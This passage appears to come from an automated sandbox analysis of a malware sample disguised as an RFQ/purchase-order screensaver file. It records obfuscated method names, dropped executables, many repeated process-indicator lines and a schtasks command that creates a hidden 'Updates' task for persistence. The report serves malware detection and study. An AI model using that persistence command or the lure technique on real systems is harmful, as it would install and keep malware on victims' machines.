                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, WxiPQ2413yrVZaeiGh.csHigh entropy of concatenated method names: 'Dispose', 'xFOXxaZUA7', 'BjyMZgSnAK', 'VHGxJT8WRl', 'G9RXRwds82', 'N3wXzQ4y7i', 'ProcessDialogKey', 'zlwM28An9u', 'DYkMXVBxn8', 'yPYMMwmmxl'
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, iIr6kyzks73p42nxWv.csHigh entropy of concatenated method names: 'HjRVHmyo2b', 'fQDVi3X1G0', 'on9V39uAU2', 'maxVy1I1HC', 'UuoVZJo3tW', 'Q37V8hBDgV', 'L0rVvU63LL', 'g4KVS0P3Yu', 'DABVOUW2De', 'dnJVNcW4Ub'
                Source: 0.2.RFQ_P.O.1212024.scr.4362708.4.raw.unpack, ChRdp5Xbobw2elyK2ZM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QRGQgxm9cq', 'j04QVFn3an', 'GJwQW8mObB', 'vxaQQhqkLw', 'B88QYHJ1qK', 'LxsQ16g75I', 'hlmQSaK8BO'
                Source: C:\Windows\SysWOW64\msinfo32.exeFile created: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrFile created: C:\Users\user\AppData\Roaming\PEJmengI.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp61C0.tmp"
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ_P.O.1212024.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\PEJmengI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
